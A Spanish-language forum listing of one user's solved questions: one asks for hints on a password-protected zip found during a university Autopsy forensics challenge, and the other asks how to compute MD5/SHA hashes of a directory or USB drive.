Dudas y pedidos generales / [SOLUCIONADO] Ayuda con reto forense usando autopsy

Septiembre 12, 2014, 08:09:50 AM

Hola necesito ayuda estoy haciendo un curso universitario y estoy usando autopsy he analizado un archivo y he extraído un archivo llamado:
content.zip pero el zip tiene password solo era por si alguien podía ayudarme o darme alguna pista de donde encontrar el password lo agradeceré mucho ya que solo me falta esto...
Aquí esta la imagen:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Un saludo haber si alguien amable me puede ayudar.

#40

Dudas y pedidos generales / [SOLUCIONADO] Se puede saber el md5 y sha de un directorio?

Septiembre 05, 2014, 04:22:18 PM

Hola me gustaría saber eso, se que se puede saber el md5 y el sha de un archivo por ejemplo para saber el md5 de un archivo podría hacer el comando:
md5sum archivo.txt
O para saber el sha tendría que hacerlo de esta manera:
shasum archivo.txt
Pero como podría saber el md5 y el sha de un directorio o carpeta por ejemplo si quiero saber el md5 de un pendrive como lo podría saber?

Páginas1 2